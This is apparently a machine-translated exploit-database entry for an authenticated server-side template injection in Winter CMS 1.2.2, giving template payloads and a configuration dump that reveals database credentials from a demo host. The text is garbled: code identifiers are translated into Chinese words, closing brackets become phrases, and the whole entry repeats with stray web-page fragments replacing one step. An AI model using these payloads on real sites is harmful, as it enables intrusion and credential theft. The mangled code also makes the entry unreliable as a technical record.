#利用标题:冬季CMS 1.2.2-服务器端模板注入(SSTI)(认证)
#利用作者: TMRSWRR
#日期: 12/05/2023
#vendor: https://wintercms.com/
#软件link: https://github.com/wintercms/winter/releases/v1.2.2
#脆弱版本: 1.2.2
#Tested : https://www.softaculous.com/demos/wintercms
1)使用管理员登录并单击CMS页面字段插件组件
2)写SSTI有效载荷: {{7*7}}
3)保存,单击Priview :
4)您将看到结果:
49
有效载荷:
{{ 倾倒() }}
结果:
'*
ATABASE'=array:4 [▼
'默认'='mysql'
'Connections'=array:4 [▼
'sqlite'=array:5 [▼
'数据库'='/home/soft/public_html/wintercmsmcviotyn9i/storage/database.sqlite'
'驱动程序'='sqlite'
'fourder_key_constraints'=true
'前缀'=''
'url'=null
这是给出的
'mysql'=array:15 [▼
'charset'='utf8mb4'
'collation'='utf8mb4_unicode_ci'
'数据库'='soft_pw3qsny'
'驱动程序'='mysql'
'引擎'='innodb'
'主机'='localhost'
'options'=[]
'密码'='8QSZ9(PT)3'
'端口'=3306
'前缀'=''
'prefix_indexes'=true
'strict'=true
'unix_socket'=''
'url'=null
'用户名'='soft_pw3qsny'
这是给出的
'pgsql'=array:12 [▶]
'sqlsrv'=array:10 [▶]
这是给出的
'迁移'=“迁移”
'redis'=array:4 [▼
'客户端'='phpredis'
'options'=array:2 [▼
'cluster'='redis'
'prefix'='Winter_database_'
这是给出的
'默认值'=array:5 [▼
'数据库'='0'
'主机'='127.0.0.1'
'密码'=null
'端口'='6379'
'url'=null
这是给出的
'cache'=array:5 [▼
'数据库'='1'
'主机'='127.0.0.1'
'密码'=null
'端口'='6379'
'url'=null
这是给出的
这是给出的
这是给出的
这是给出的
#利用作者: TMRSWRR
#日期: 12/05/2023
#vendor: https://wintercms.com/
#软件link: https://github.com/wintercms/winter/releases/v1.2.2
#脆弱版本: 1.2.2
#Tested : https://www.softaculous.com/demos/wintercms
1)使用管理员登录并单击CMS页面字段插件组件
正在加载...
demos6.demo.com
3)保存,单击Priview :
正在加载...
demos6.demo.com
49
有效载荷:
{{ 倾倒() }}
结果:
'*
ATABASE'=array:4 [▼'默认'='mysql'
'Connections'=array:4 [▼
'sqlite'=array:5 [▼
'数据库'='/home/soft/public_html/wintercmsmcviotyn9i/storage/database.sqlite'
'驱动程序'='sqlite'
'fourder_key_constraints'=true
'前缀'=''
'url'=null
这是给出的
'mysql'=array:15 [▼
'charset'='utf8mb4'
'collation'='utf8mb4_unicode_ci'
'数据库'='soft_pw3qsny'
'驱动程序'='mysql'
'引擎'='innodb'
'主机'='localhost'
'options'=[]
'密码'='8QSZ9(PT)3'
'端口'=3306
'前缀'=''
'prefix_indexes'=true
'strict'=true
'unix_socket'=''
'url'=null
'用户名'='soft_pw3qsny'
这是给出的
'pgsql'=array:12 [▶]
'sqlsrv'=array:10 [▶]
这是给出的
'迁移'=“迁移”
'redis'=array:4 [▼
'客户端'='phpredis'
'options'=array:2 [▼
'cluster'='redis'
'prefix'='Winter_database_'
这是给出的
'默认值'=array:5 [▼
'数据库'='0'
'主机'='127.0.0.1'
'密码'=null
'端口'='6379'
'url'=null
这是给出的
'cache'=array:5 [▼
'数据库'='1'
'主机'='127.0.0.1'
'密码'=null
'端口'='6379'
'url'=null
这是给出的
这是给出的
这是给出的
这是给出的
